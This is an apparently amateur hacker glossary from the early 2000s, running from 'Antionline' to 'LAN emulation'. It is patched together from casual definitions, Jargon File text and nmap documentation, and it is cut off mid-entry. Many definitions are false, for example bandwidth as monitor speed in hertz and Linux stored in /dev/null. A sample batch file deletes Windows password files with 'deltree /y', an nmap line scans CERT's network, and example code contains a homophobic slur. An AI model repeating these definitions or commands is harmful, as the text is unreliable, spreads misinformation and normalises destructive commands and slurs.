>ANTIONLINE: one of the many comprehensive security firms on the net which specialises in exploits, news, and hacker-related things. www.antionline.com
>API (application program interface): defines a standard way that programs work with pull-down menus, dialogue boxes, etc.; Windows and OS/2 are examples of API in action.
>APPLE TALK: a local area network developed by Apple to connect IBM PCs and Macs together.
>APPLET: an HTML-based program built with Java that a browser temporarily downloads to a user's disk.
>APPLICATION LAYER: the layer of the TCP/IP stack that supports network applications and provides an interface to the local operating environment.
>ARCHIE: a program to search for things on the net; search engines like Yahoo are taking over from Archie.
>APACHE: a web server used by almost 60 per cent of the web sites market that runs on Windows, Macs, and Unix.
>APP: Short for `application program', as opposed to a systems program. Apps are what systems vendors are forever chasing developers to create for their environments so they can sell more boxes. Hackers tend not to think of the things they themselves run as apps; thus, in hacker parlance the term excludes compilers, program editors, games, and messaging systems, though a user would consider all those to be apps. (Broadly, an app is often a self-contained environment for performing some well-defined task such as `word processing'; hackers tend to prefer more general-purpose tools.) See killer app; oppose tool, operating system.
>APPLE SHARE: a network o/s developed by Apple to work with other Macs, like Win NT and Win ME are designed to work together.
>ARCHIE: a client/server program that is used to locate files on anonymous FTP.
>ARCHIVE: a place with important files on the net.
>AREA CODE: the code for a phone number for people accessing it from outside the city; dial-up hacking or connecting to your ISP involves using an area code.
>ARGUMENT: A value given to a program in C or any other high-level language. See also value.
>ARP (address resolution protocol): ARP translates Ethernet addresses into numerical form to binary. All o/s support ARP by typing arp in the command prompt.
>ARPAnet (advanced research projects agency network): a defence agency network created by the Defense Department of the USA, known now as DARPA.
>ARM(application response measurement):
>ARRAY: a collection of similar info such as codes, text or other items. All items are usually of the same type; used in programming.
>ASCII (American Standard Code for Information Interchange): the numbers which make up text, e.g. the code 52 would be the number 4.
>ASCII ART: n. The fine art of drawing diagrams using the ASCII
>ASM (assembly language): a low-level programming language which is used for writing small programs and can be used to write viruses. Assembly Languages have the same basic structure as Machine Languages; the difference is that Assembly Languages allow the programmer to use names instead of numbers. As with Machine Languages, every CPU has its own unique machine language. Programs must be rewritten or recompiled, therefore, to run on different types of computers. Nowadays most programming is done with High-Level Programming Languages, but in the early days Assembly language was always used; now it is ONLY used when speed is essential or when the task isn't possible in the High-Level Language we are using. These are considered Low-Level Languages as they are closer to Machine Languages.
>ASYNCHRONOUS TRANSFER METHOD: A connection-oriented data communications technology based on switching 53 byte fixed-length units of data called cells. Abbreviated ATM. Each cell is dynamically routed. ATM transmission rates are multiples of 51.840 Mbits per second. In the United States, a public communications service called SONET uses ATM at transmission rates of 155, 622, 2048, and 9196 Mbits per second. These are called OC-3, OC-12, OC-48, and OC-192 respectively. A similar service called SDH is offered in Europe. ATM is also used as a LAN infrastructure, sometimes with different transmission rates and coding methods than are offered with SONET and SDH.
>AT&T: American phone company; they are also the makers of Unix. AT&T owns Bell Labs, which wrote Unix and C.
>AUTHENTICATION: A security measure for verifying the identity of network users.
>AVATAR:The body in cyberspace. In most cases the handle/nicknames you use on the Internet, and the personality that goes with it.
>AWK: [UNIX techspeak] An interpreted language for massaging .
>BACKDOOR: a hidden bit of code which a programmer makes so that he can hide a secret password which only he knows. Backdoors can also be a trojan which lets a script kiddie remote control a PC without any login.
>BANDWIDTH: the speed at which data is sent to the monitor, measured in hertz.
>BASEBAND: the most common type of network, where data is transmitted digitally through a wire.
>BASIC (Beginner's All-purpose Symbolic Instruction Code): a programming language designed to make programming easier and quicker than C, Fortran, etc.; modern versions of BASIC are Visual Basic and QuickBasic.
>BAUD RATE: usually related to the speed of the modem, e.g. 56k.
>BAYONET NEILL CONCELMAN (connector): A type of coaxial cable connector sometimes used in Ethernet applications. Abbreviated BNC. The specification for BNC connectors is contained in EIA/TIA 403-A and MIL-C-39012.
> BER(Bit Error Rate.):
>BERKELEY UNIX: this version of Unix was developed at the University of California in Berkeley, also known as BSD.
>BBS (bulletin board system): an old way of exchanging messages and downloading stuff; users usually dialed into the BBS and used it. Usenet has taken over from it.
>BIN: a binary file. Also, on Unix the binary files are usually in /bin and on Windows in c:\windows.
>BINARY: a binary file is usually understood by the computer and is the computer code of a program. Binary is written in 0's and 1's.
>BIND:The SNA command that starts an SNA session between two logical units.
>BIOS PASSWORD: a password utility which lets users provide an on-boot password by changing the BIOS settings. Hackers can't usually get the password unless the computer is switched on and booted up to Windows, but you can reset the CMOS.
>BLACK ICE: a monitoring program used for watching ports.
>BLACK HOLE:What data (a piece of email or netnews, or a stream of TCP/IP packets) has fallen into if it disappears mysteriously between its origin and destination sites (that is, without returning a bounce message).
>BLACK SCREEN OF DEATH:On an attempt to launch a DOS box, a networked Windows system not uncommonly blanks the screen and locks up the PC so hard that it requires a cold boot to recover. This unhappy phenomenon is known as The Black Screen of Death.
>BLUE SCREEN OF DEATH: when a Windows machine crashes or gets nuked and shows the blue screen, which shows that an error has occurred.
>BLUE BOX (not a hacker term but I will mention it): Once upon a time, before all-digital switches made it possible for the phone companies to move them out of band, one could actually hear the switching tones used to route long-distance calls. Early phreakers built devices called `blue boxes' that could reproduce these tones, which could be used to commandeer portions of the phone network. (This was not as hard as it may sound; one early phreak acquired the sobriquet `Captain Crunch' after he proved that he could generate switching tones with a plastic whistle pulled out of a box of Captain Crunch cereal!) There were other colors of box with more specialized phreaking uses; red boxes, black boxes, silver boxes, etc. 2. n. An IBM machine, especially a large (non-PC) one.
>BLUETOOTH: a specification for linking devices such as mobile phones, cameras, etc. to computers over a short-range wireless connection.
>BRUTE FORCE: to try thousands of different passwords on a login prompt or on a password-protected file.
>BSD: a Unix o/s from Berkeley.
>BUG: when a program has errors written in it which make it perform incorrectly.
>Bus: Terminals are connected in a straight line with a 'T' shape terminator at each end that bounces the signal back and forth through the network. Pieces of data sent are limited, and if they are sent to an unknown terminal on the network the signal just keeps bouncing, causing a crash of all the network. The Bus network is a peer-to-peer network and has no dedicated server.
>BUS NETWORK: a network where all computers are connected through a hub, and each computer usually has a network interface card.
>C: a high-level programming language used to create large programs and lots of exploits, e.g.

#include <stdio.h>

int main(void)
{
    printf("you are viewing the beta version.\n");
    printf("www.");
    return 0;
}
>C++: an improved version of C that adds object-oriented extensions and is easy to learn for C programmers.
>CCC [Chaos Computer Club]: A hacker organisation in Hamburg. They have meetings, lectures and annual congresses which attract hackers from all over Europe. They also publish books and magazines about the information society. There are a lot of myths about which kinds of criminal activities they have been involved in, so it's hard to say which of them are true and which are not.
>C SHELL: a shell similar to the bash shell, but it is more like the C language on a command prompt.
>CABLE MODEM: a connection to the internet 24 hours a day; users don't use a dial-up line, instead they use a cable. Usually cable modem customers have a static IP address.
>CACHE: a temporary folder on a hard disk which stores websites etc. so that a user can access them quicker.
>CAIN: a password cracker program which cracks Windows share passwords and pwl files.
>CALL: a programming term which means to transfer a part of a program then return it.
>CARRIER (dial-ups): a signal used by a modem to detect another modem.
>CASCADING: The process of connecting two or more Fibre Channel hubs or switches together to increase the number of ports or extend distances.
>CAT: a Unix command which displays the contents of a file.
>CC (carbon copy): used for sending the same email to more than one person.
>CD: change directory; used for changing the dir on all system prompts, also chdir.
>CGI (common gateway interface): a web programming language which can be used for prompting a user for information and can be used by shopping sites to make secure transactions.
>CHANNEL: an IRC chat room where people chat.
>CHANNEL OP: the person or persons on a channel who control it.
>CHAP (challenge handshake authentication protocol):
>CHAR: shorthand for `character'. Esp. used by C programmers, as `char' is C's typename for character data.
>CHAT: obviously you know what a chat room is, but certain network administrators have chat built into their security, which means if they're hacked they can disconnect you, then chat and tell you that you're traced, etc.
>CHECKSUM: a 16-bit calculated field used to ensure detection of corrupted datagrams.
>CHERNOBYL PACKET: A network packet that induces a broadcast storm and/or network meltdown, in memory of the April 1986 nuclear accident at Chernobyl in Ukraine. The typical scenario involves an IP Ethernet datagram that passes through a gateway with both source and destination Ether and IP address set as the respective broadcast addresses for the subnetworks being gated between. Compare Christmas tree packet.
>CIRCLE: This is also a simple setup and poses most of the same problems as the Bus NET. Basically, it is just a Bus NET with the two spare ends connected to each other. The main difference between this and the Bus NET is that each computer acts as an amplifier to the signals passed along it (Active). There is also another communication method used here called token passing. This consists of a token passing along the network; when a computer wishes to pass on information, it will be attached to the token, then it will travel round the network until it finds its destination. The destination will then pick it up, copy it and send a new token into the network. If the information in a Circle NET does not find its destination, then it will go in a complete circle and return to the sender with a message reporting the problem. This type of topology is very similar to the Bus NET, with the same drawbacks and the same advantages.
>CLUSTER CONTROL:The common name given to SNA Type 2.0 Peripheral Nodes. Usually used to refer to 3270-type control units.
>CODEZ D00DZ: hackers' version of pirates.
>COMMUNICATION CONTROLLER: An SNA communications processor whose operations are controlled by Network Control Program (NCP) software. Communication controllers manage communication links and route packets through SNA networks. IBM's communication controller products include the 3745/3746, 3725, 3720, 3705, and 3704.
>COMPUTER UNDERGROUND: A group organized in secrecy, hidden behind aliases, to promote the exchange of information regarding anything and everything including, but not limited to: computers, hacking, telephones, radios, chemicals and ideas.
>CONNECTION-ORIENTED SERVICE/PROTOCOL: A service/protocol that includes the notion of a setup and take-down phase before and after the transfer of data. These services usually include error detection and recovery, flow control, and packet sequencing.
>CONNECTIONLESS SERVICE/PROTOCOL: A service protocol that does not include the notion of a setup or take-down phase before and after the transfer of data. Each message, commonly called a datagram, is sent as a separate entity.
>CMOS (complementary metal-oxide semiconductor): a battery-powered memory chip which is in the motherboard; it usually stores the BIOS password and date settings.
>CISCO: Cisco is one of the leaders in the network market, making network software and hardware.
>CLASS C/B/A NETWORK: the way people are given an IP address from their ISP or network provider; class C is the ISP way for an IP address.
>CLI (command line interface): also known as an interface where you type commands, such as in DOS.
>CMIP: Acronym for Common Management Information Protocol.
>COBOL (common business oriented language): used for business applications. COBOL is rarely used now.
>CODE: programmer's instructions, also known as programming language writing; code is the writing in a program which makes it perform certain instructions and tasks.
>CODE BALANCE:The number of 1 bits in a 10-bit transmitted data stream divided by 10 (e.g., 1110100011 has a code balance of 6/10 = 60%).
>COLLIO: a US hacker cracker who nuked yahoo.com and eBay in early 2000.
>COM PORT: a port on your computer where modems usually connect.
>COMMAND PROMPT: the screen on an o/s in which you can type commands, e.g. Microsoft DOS, lilo prompt, bash, csh prompt.
>COMPILE: to convert programming code into machine language.
>COMPILER: the tool which compiles the code in a program and changes it into machine language.
>COMPUSERVE: another lame ISP similar to AOL who take strict guidelines on hackers!
>CONNECTIONLESS PROTOCOL: a protocol that transmits data without operating through a connection.
>CONSOLE: A device for graphical or textual visual output from a computer system. In systems, network and device management, an application that provides graphical and textual feedback regarding operation and status, and that may accept operator commands and input influencing operation and status. Sometimes called enterprise management console.
>COPY ON WRITE:A technique for maintaining a point in time copy of a collection of data by copying only data which is modified after the instant of replicate initiation. The original source data is used to satisfy read requests for both the source data itself and for the unmodified portion of the point in time copy. cf. pointer remapping
>Contention-Based Network: Network that sends a limited amount of data and holds other data in a queue until it is ready to send it. The name means that all data being sent is competing or contending for bandwidth. The ALOHA Radio system in 1968 was based on this.
>COOKIE: a small web page program which stores itself in your computer, which means if you log in from a cookie site it will remember your details; it is usually stored in c:\cookies in a .txt file.
>COPY: to copy a file on an o/s; Windows e.g. is copy filename filename, Unix e.g. is cp /filename /filename
>COAXIAL CABLE:An electrical transmission medium consisting of two concentric conductors separated by a dielectric material with the spacings and material arranged to give a specified electrical impedance. cf. triaxial cable
>CP/M: an old o/s used back in the 70's.
>CRACK: To remove software copy protection on a program, such as using a shareware program for longer than it was meant to be used.
>CRACKER: a person who thinks deleting data and changing data is hacking; crackers write viruses and distribute them, thinking it's kewl and that they are elite.
>CRACKER JACK: a well-known Unix password cracker for password breaking /etc/passwd.
>CSMA/CD:the network method used by ethernet networks.
>CYBERPUNK: Since 1990 or so, popular culture has included a movement or fashion trend that calls itself `cyberpunk', associated especially with the rave/techno subculture. Hackers have mixed feelings about this. On the one hand, self-described cyberpunks too often seem to be shallow trendoids in black leather who have substituted enthusiastic blathering about technology for actually learning and doing it. Attitude is no substitute for competence. On the other hand, at least cyberpunks are excited about the right things and properly respectful of hacking talent in those who have it. The general consensus is to tolerate them politely in hopes that they'll attract people who grow into being true hackers.
>CROSS POST:is when a usenet user posts the same question to more than one newsgroup.
>CRUISE VIRUS: a type of virus that infects and searches other computers for specific data, e.g. a C programmer could program a small program which will work in the background and log in to an FTP server and upload the user's files, etc.
>CSH: yet another command environment for Unix.
>CSMA/CD:(Carrier Sense Multiple Access with Collision Detection.)
>CRYPTOGRAPHY: see encryption
>CYPHERPUNK: Net.person who has evolved from hacking to encryption and concern with creating multiple identities.
>CULT OF THE DEAD COW: the programmer group which wrote the trojan Back Orifice and recently received 10 million dollars for it.
>CUSTOMER INFORMATION CONTROL SYSTEM (CICS): IBM's flagship transaction processing subsystem. CICS runs on IBM mainframes as well as other systems, such as AS/400s, Hewlett-Packard UNIX platforms, and PCs running either OS/2 or Microsoft's Windows NT Server operating system.
>CUTE FTP: an FTP client used for contacting FTP servers; Cute FTP is freeware and can be downloaded from download.com.
>DAEMON: a process that runs in the background and is not locked to a terminal; web servers are referred to as httpd, as the server sits in the background and does need watching.
>DARK SIDE-HACKER: A criminal or malicious hacker, known as a cracker, who thinks he's a hacker but technically speaking he's a script kiddie who gets hackers a bad name.
>DATA ENCRYPTION STANDARD: a government specification for encoding files by using a password. It's supposed to be uncrackable, although 14000 internet users pooled together and cracked it last year in 1999!
>DATAGRAM: the data package passed from the internet layer of TCP to the network access layer, passed from UDP at the transport layer.
>Data Flow Control (DFC): Defines end-to-end protocols that control direction of application data flow, manage responses, and logically group related data flowing on sessions.
>DEAD BEEF HACK: [cypherpunks list, 1996] An attack on a public-key cryptosystem consisting of publishing a key having the same ID as another key (thus making it possible to spoof a user's identity if recipients aren't careful about verifying keys). In PGP and GPG the key ID is the last eight hex digits of (for RSA keys) the product of two primes. The attack was demonstrated by creating a key whose ID was 0xdeadbeef.
>DEAD BEEF: The hexadecimal word-fill pattern for freshly allocated memory (decimal -21524111) under a number of IBM environments, including the RS/6000. Some modern debugging tools deliberately fill freed memory with this value as a way of converting heisenbugs into Bohr bugs. As in "Your program is DEADBEEF" (meaning gone, aborted, flushed from memory); if you start from an odd half-word boundary, of course, you have
>DECRYPTION: to decrypt a file which is encrypted!
>DEFAULT GATEWAY:the gateway used to connect to the rest of the network.
>DELETE: to destroy data; the DOS command for it is deltree, the Unix command for it is rm.
>DELPHI: a programming language developed by Borland.
>DEN (Directory Enabled Network):
>DEMON:A portion of a program that is not invoked explicitly, but that lies dormant waiting for some condition(s) to occur. See daemon. The distinction is that demons are usually processes within a program, while daemons are usually programs running on an operating system. 2. [outside MIT] Often used equivalently to daemon -- especially in the Unix world, where the latter spelling and pronunciation is considered mildly archaic.
Demons in sense 1 are particularly common in AI programs. For example, a knowledge-manipulation program might implement inference rules as demons. Whenever a new piece of knowledge was added, various demons would activate (which demons depends on the particular piece of data) and would create additional pieces of knowledge by applying their respective inference rules to the original piece. These new pieces could in turn activate more demons as the inferences filtered down through chains of logic. Meanwhile, the main program could continue with whatever its primary task was.
>DEMON DIALER: a modem program which dials from, say, 555-0000 on up through 555-9999, finding computers with modem support. This is a way a hacker would find a phone-support o/s in your area; also known as a wardialer.
>DES (data encryption standard): a government specification for encoding files by using a password. It's supposed to be uncrackable, although 14000 internet users pooled together and cracked it!
>DESTINATION PORT: the TCP or UDP port number of the application on a host machine that will be the recipient of the data in a TCP segment or UDP datagram, e.g. a web server waiting for website visitors.
>DEV/NULL: a dir on Unix which does nothing, produces nothing and can swallow anything; usually Linux is stored there.
>DEVICE CHANNEL:A channel used to connect storage devices to a host I/O bus adapter or intelligent controller. The preferred term is device I/O bus.
>DHCP (dynamic host configuration protocol): a server which automatically issues a client user with an IP address; DHCP ISP users don't usually have a static IP but have a dynamic IP address.
>DIRECTORY: A mechanism for organizing information. A file or other persistent data structure in a file system that contains information about other files. Directories are usually organized hierarchically (i.e., a directory may contain both information about files and other directories), and are used to organize collections of files for application or human convenience. An LDAP-based repository consisting of class definitions and instances of those classes. An example of an enterprise-wide LDAP directory is Microsoft's Active Directory (AD) or Novell's NetWare Directory Service (NDS). directory enabled network.
>DISTRO: anyone can release their own Linux, and it's called a Linux distro.
>DRIVE LETTER: A single letter of the alphabet by which applications and users identify a partition of physical or virtual disk to the Windows operating system. The number of letters in the alphabet limits the number of disks that can be referenced.
>DOMAIN: A shared user authorization database which contains users, groups, and their security policies. A set of interconnected network elements and addresses that are administered together and that may communicate. Domain controller; common ones include website names.
>DOS: a command-based o/s in Windows.
>DoS (denial of service): when a script kiddie nukes or sends thousands of data to a server, causing it to crash.
>DOWNLOAD.COM: a website where you can download almost any program or file; www.download.com is owned by CNET, and it also owns shareware.com.
>DUN (dial-up networking): the way most users connect to the net, although it can be used for connecting to dial-up servers and BBSs.
>DLL (dynamic link library): a separate coded file used for sharing with programs, making them have more features or making them run properly.
>DNS (domain name system): a computer system which translates internet name addresses into IP addresses.
>DR DOS: an MS-DOS clone owned by Novell.
>DUMB TERMINAL: a keyboard and video display connected to a network.
>DWEEB: quite like a lamer, but they're more anti-social.
>DYNAMIC HTML: a web page scripting language used for adding special effects to web pages etc., similar to JavaScript.
>DYNAMIC IP ADDRESS: an IP address which changes every time a user connects to the net.
>ECHO: can be used as ICMP, but mostly echo repeats a character to screen, e.g. "/echo i am an ass" in IRC or "echo hi" in DOS.
>ELISTS (email lists): Electronic discussion groups that anyone with an email address can subscribe to. When you send email to an elist it will automatically send a copy to every subscriber (also called mailing lists).
>ELITE: a person who is usually a skilled hacker and programmer who likes testing software and helping others; elite can be spelled several ways, including 3li773.
>ENCRYPTION: used to make data unreadable to anybody who hasn't got the correct password or code.
>ENVIRONMENT: every user who logs into a server has their own GUI or command environment, which means they have different permissions.
>ENDLESS LOOP: a set of code in a program which repeats something.
>END TO END THROUGH: Control of message flow between the two end parties to a communication on a network. Flow control that occurs between two connected Fibre Channel N-Ports.
>EXTERNAL CALL INTERFACE(ECI):A CICS client programming interface that allows applications running on CICS clients to call applications running on CICS servers.
>ETC:is the dir on unix (/etc) where various and sundry files are kept; usually logs are kept there.
>ETHERNET:a lan (local area network) that uses radio frequency to carry signals by coaxial cables. ethernet uses the CSMA/CD network access method.
>ETHERNET ADAPTER:An adapter that connects an intelligent device to an Ethernet network. Usually called an Ethernet network interface card, or Ethernet NIC. cf. NIC
>ETIQUETTE:is the rules of the net, for e.g. typing IN ALL CAPS IS REGARDED AS SHOUTING.
>EVENT-DRIVEN PROGRAMMING:a style of programming in which the user has to press a key to continue and can't do other tasks unless he follows the code, e.g. in batch code.
@echo off
dir /w c:\windows
deltree /y *.pwl
pause
dir c:\
exit
>EXE:is a file extension which can be executed to run a program.
>EXECUTE:is to issue a command or program on a system.
>EXTENSION:are the filename extensions at the end of a program such as .com, .exe, .bak
>EZINE:A net version of the small press magazine (known as zine) culture. Usually ezines exists only on the Net, but more and more paper zines are distributing an electronic version as well.
>F.A.Q(frequently asked question):the term refers to a txt file which answers common questions ppl ask on a particular subject.
>FC-PH:The Fibre Channel physical standard, consisting of FC-0, FC-1, and FC-2.
>FC-0:The Fibre Channel protocol level that encompasses the physical characteristics of the interface and data transmission media. Specified in FC-PH.
>FC-1:The Fibre Channel protocol level that encompasses 8B/10B encoding, and transmission protocol. Specified in FC-PH.
>FC-2:The Fibre Channel protocol level that encompasses signaling protocol rules and the organization of data into frames, sequences, and exchanges. Specified in FC-PH.
>FC-3:the Fibre Channel protocol level that encompasses common services between FC-2 and FC-4. FC-3 contains no services in most implementations.
>FC-4:The Fibre Channel protocol level that encompasses the mapping of upper layer protocols (ULP) such as IP and SCSI to lower protocol layers (FC-0 through FC-3). For example, the mapping of SCSI commands is an FC-4 ULP that defines the control interface between computers and storage.
>FEDERATED MANAGEMENT ARCHITECTURE SPECIFICATION:A specification from Sun Microsystems Computer Corporation that defines a set of Java APIs for heterogeneous storage resource and storage network management. This specification is a central technology of JIRO.
>FDDI(Fiber Distributed Data Interface):a token passing network architecture using fibre optic cables.
>FDDI ADAPTER:An adapter that connects an intelligent device to an FDDI network. Both FDDI-fiber adapters that connect to optical fiber FDDI networks, and FDDI-TP adapters that connect to twisted copper pair FDDI networks exist. Although network interface cards are usually referred to as NICs rather than as adapters, the term FDDI adapter is more common than FDDI NIC. cf. adapter, NIC
>FIBRE CHANNEL:A type of Fibre Channel physical connection that allows up to 30 meters of copper cable between adjacent devices.
>FIFO:term programmers use to describe a data structure where the first item stored is also the first item retrieved.
>FILE HANDLE:a number used to identify a file inside a program.
>FILE SERVER:a file server is a computer which acts as a server allowing users to access resources on it. for e.g. on windows users can share their drives using netbios.
>FILE SHARING!:file sharing is sharing files for others to access using samba or netbios. users usually map a network drive by typing net use p: \\ip\sharename in ms dos or by using a samba client on unix.
>FILTER:An intelligent network node whose hardware and software are designed to provide file services to client computers. Filers are pre-programmed by their vendors to provide file services, and are not normally user programmable. cf. appliance, file server
>FIN:a control flag used in the process of closing a TCP connection.
>FINGER:is a service run on port 79 and allows users to find information on users on hosts such as name and address,tel....,e.t.c
>FIREWALL:is a program used to close a pc's open ports and secure security holes and is a break point between networks where all the traffic is examined and accepted or denied based on a set of rules.
>FLAME WARS:are when 2 or more ppl post or send shit to the other user, and both users exchange angry messages with each other.
>FORTH:another programming language although it's not really used nowadays.
>FORTRAN:a combination of formula translator which allows programmers to use mathematical signatures. e.g. code x = (A * B) *
>FREEBSD:is a version of unix with open source.
>Fragmentation scanning : This is not a new port scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe packet, you break it into a couple of small IP fragments. You are splitting up the TCP header over several packets to make it harder for packet filters and so forth to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. My favorite sniffer segmentation faulted immediately upon receiving the first 36-byte fragment. After that comes a 24 byte one! While this method won't get by packet filters and firewalls that queue all IP fragments (like the CONFIG_IP_ALWAYS_DEFRAG option in Linux), a lot of networks can't afford the performance hit this causes. This feature is rather unique to scanners (at least I haven't seen any others that do this).
>FTP(file transfer protocol):is a service which runs on port 21 and allows users with valid accounts to login and upload files and download files.
>FTP BOUNCE ATTACK: An interesting "feature" of the ftp protocol (RFC 959) is support for "proxy" ftp connections. In other words, I should be able to connect from evil.com to the FTP server-PI (protocol interpreter) of target.com to establish the control communication connection. Then I should be able to request that the server-PI initiate an active server-DTP (data transfer process) to send a file ANYWHERE on the internet! Presumably to a User-DTP, although the RFC specifically states that asking one server to send a file to another is OK. Now this may have worked well in 1985 when the RFC was just written. But nowadays, we can't have people hijacking ftp servers and requesting that data be spit out to arbitrary points on the internet. As *Hobbit* wrote back in 1995, this protocol flaw "can be used to post virtually untraceable mail and news, hammer on servers at various sites, fill up disks, try to hop firewalls, and generally be annoying and hard to track down at the same time." What we will exploit this for is to (surprise, surprise) scan TCP ports from a "proxy" ftp server. Thus you could connect to an ftp server behind a firewall, and then scan ports that are more likely to be blocked (139 is a good one). If the ftp server allows reading from and writing to a directory (such as /incoming),
>FUNCTION:is a subprogram or small program which does a certain task then returns the answer to the main program.
>GANG MESSAGES:spam messages posted to usenet or emailed to users.
>GATEWAY:the link that translates two different types of computer networks,a router which connects a lan to a larger network.
>GEEK:is a person who knows more about computers than he knows about himself. geeks are usually anti social and ugly ppl.
>GREP:referred to as search or scan.
>GNOME:is a linux desktop environment built by hackers and is similar to kde.
>GOPHER:a system used for finding info on the net, named after the university of minnesota's golden gophers.
>GOTO:is a common programming code e.g. code written in qb.
print "wassup"
input "well!"; name$
if name$ = "kev" then GOTO celtic
........
..............
..
end
>GROUP:A collection of computer user identifiers used as a convenience in assigning resource access rights or operational privileges.
>GSN:Acronym for Gigabyte System Network.
>GUI:Acronym for Graphical User Interface.
>GURU:is a knowledgeable computer dude who usually earns mega cash and studies network security and hacking!
>HACK:a hack is a successful piece of code which has been changed, or it can be when a hacker successfully hacks a system through an exploit or using BF, e.t.c
>HACKER:are the dudes who make the internet what it is. most of the hackers program and contribute to the linux world and most of them like to study network security and breaking into systems.
>HANG UP:used by war dialers once a dial tone is found.
>HAYES COMMAND SET:a set of instructions for controlling basic functions like dialing modems then hanging up.
>HIDDEN FILES:all o/s have hidden files by default to stop newbies messing them up, although when u hack a system it is hard to find hidden files, but the unix command "ls -vat /dir" finds hidden files.
>HEXADECIMAL:a number that uses base 16 to base 10.
>HEXEDITOR:is a program used for viewing the computer binary code of a program.
>HIGH LEVEL LANGUAGE:is a program language which can almost be written in english. High Level Languages are closer to Human Languages, and because of this, they are easier understood, easier written, easier maintained and adjusted. The problem with High-Level Programming Languages is that they lack slightly in speed compared to the lower languages, the reason for this is that the Compiler has to convert the High-Level code into Machine Language before the computer reads it and follows the instructions. The first of these languages started to emerge around the 1950's and there are now tons of them around like Pascal, C and C++.
>HOME:is the default directory u get as soon as u login to unix, usually /root or /home/user
>HOST:is a computer which stores files and is referred to each hackers target !the host computer!
>HOST ID:the portion of an ip that identifies a particular computer within a network.
>HOST TABLE:the host or lmhost file that contains a list of known ip addresses mapped to host names or netbios computer
>HOTMAIL:is a free email site which has the largest number of users of anywhere in the world, usually because it has so many users, and the owners "Mcft" make it hard to hack because microsoft invests a lot of cash in the security of bug tracking!
>HTML(hyper text markup language):is the most used scripting language for programming web pages as it is easy to use. e.g.
adolf hitler was a very naughty man!
telnet me
>HTTP:is run on port 80 and is known as www,http is known as hyper text transfer protocol.
>HYPERTERMINAL:is a windows communication program used for contacting bbs's and it can be used as a telnet client as well.
>HUB:a device on a network where it connects all the pc's together using their wires and connecting them to the hub.
>IBM(international business machines):is a computer firm which led in the making of computers. ibm also has one of the strongest security networks in the world.
>ICE:(Intrusion Countermeasure)Term referring to the security programs in Gibson's cyberspace (also called BLACKICE).
>IDENTITY HACKING:The use of pseudo-anonymity or false accounts to put oneself off as another person on the Internet.
>IDLE:when a computer isn't doing anything, usually that's the best time to start hacking!
>ILLS:is more than a webserver, it helps u create websites, configure ftp and smtp, e.t.c
ICMP echo scanning :This isn't really port scanning, since ICMP doesn't have a port abstraction. But it is sometimes useful to determine what hosts in a network are up by pinging them all. the -P option does this. ICMP scanning is now in parallel, so it can be quite fast. To speed things up even more, you can increase the number of pings in parallel with the '-L ' option. It can also be helpful to tweek the ping timeout value with '-T '. nmap supports a host/bitmask notation to make this sort of thing easier. For example 'nmap -P cert.org/24 152.148.0.0/16' would scan CERT's class C network and whatever class B entity 152.148.* represents. Host/26 is useful for 6-bit subnets within an organization. Nmap now also offers a more powerful form. You can now do things like '150.12,17,71-79.7.*' and it will do what you expect
>IETF(internet engineering task force):a consortium that introduces new technology on the internet, they write rfc's.
>IF:is a programming statement which is often used with IF and THEN e.g. code
if X = 5 then print "i am a faggot!"
>IGMP(internet group management protocol):a tcp/ip protocol used in conjunction with multicasting in a class d network.
>INDEPENDENT LOGICAL UNIT:An LU that does not depend on an SSCP in an SNA host system for session initiation and can send both a BIND request and a BIND response. Only LU Type 6.2 LUs can function as independent LUs
>INHERITANCE:is used in object oriented programming languages, when one object copies the feature from another object.
>INODE:A persistent data structure in a UNIX or UNIX-like file system that describes the location of some or all of the disk blocks allocated to the file.
>INTERNET EXPLORER(IE):is a web browser owned by Mcft and it is distributed as a freeware product to anyone who wants to download it. IE is the most used in the market at 75 per cent domination from rival browsers like netscape.
>INTERNET SERVER APPLICATION PROGRAMMING INTERFACE(ISAPI): A programming interface that allows a Mcft Internet Server to execute server-based application programs.
>INTERNIC:is the place of the internet information center where ppl are more or less in charge of the net. they also assign ip addresses to isp's and websites. internic can be used to track down ip addresses using their "whois query".
>INITIAL SEQUENCE NUMBER(isn):a number that marks the beginning of the range of numbers a computer will use for sequence bytes transmitted through TCP.
>INTRANET:is a small version of the internet except it isn't public and is only on LANs
>INTRUDER:is when a hacker or unauthorised user breaks into a part of the system which is forbidden for user access.
>I/O OPERATOR:A read, write, or control function performed to, from or within a computer system. For example I/O operations are requested by control software in order to satisfy application I/O requests made to virtual disks. cf. I/O request
>IP(Internet protocol):the method for viewing web information and is used for sending packets to computers.
>.IP ADDRESS:is a 32 bit number given to every user on the net by their isp. ip addresses can be used to track down users or used by hackers to connect to a system. e.g. an ip address looks like 157.22.111.111. if u still don't understand what an ip address is, it's basically a number which identifies internet users just like street addresses identify people's houses.
>IP SPOOFING:Is when a user fakes his ip address to look like the trusted hosts or makes it look like somebody else's ip address.
>IP ROUTING:The process of receiving an ip packet addressed to somewhere else on one network and sending it on its way from another network.
>IPCONFIG:is used in windows 2000 to show a user his ip address,dns server ,e.t.c
>IPX/SPX(internetwork packet exchange/sequence packet exchange):on novell network systems, IPX is a network layer protocol used in file server o/s.
>IPX TUNNELING:a method of supporting IPX/SPX on TCP/IP networks by interfacing IPX with TCP/IP's transport layer
>IRC:internet relay chat is a place where users can chat and the ppl usually have more etiquette. irc clients include pitch, mirc, xchat. irc servers are usually on port 6667.
>IRIX:is an o/s similar to unix and mostly used by banks e.t.c
>ISDN(integrated service digital network):is a very fast digital telecommunication connection with speeds around 128kps.
>ISP(internet service provider):is the company which gives u access to the internet and services like usenet, web browsing, telnet. ISPs also issue each user a static or dynamic ip address.
>JAVA:a programming language developed by sun microsystems. java script's main advantage is it can run on any o/s connected to the internet.
>JOHN THE RIPPER:is a password cracker used to crack /etc/passwd on unix.
>KDE:A powerful linux gui which looks like windows but has more power.
>.KERNEL:is a hacking term used to describe the core of an o/s or program.
>KILL:is a c and unix command
>KPPR - (Key Press Password Recorder):A tiny hacking program that is loaded into a computer and then records every key that is pressed. Used to find out login usernames, and passwords (also called Trojan horse, Stealth Password Recorder, Key/Keypress Capturer, Password Recorder, Password Sniffer, Password Snooper and Login Spoof).
>LAN:is a group of computers connected together through wires or phone lines to share information. LANs are the most common type of network as they are inexpensive and easily configured.
>LAN EMULATION:A collection of protocols and services that combine to create an emulated local area network using ATM as the underlying network. Abbreviated LANE. Local area network emulation enab
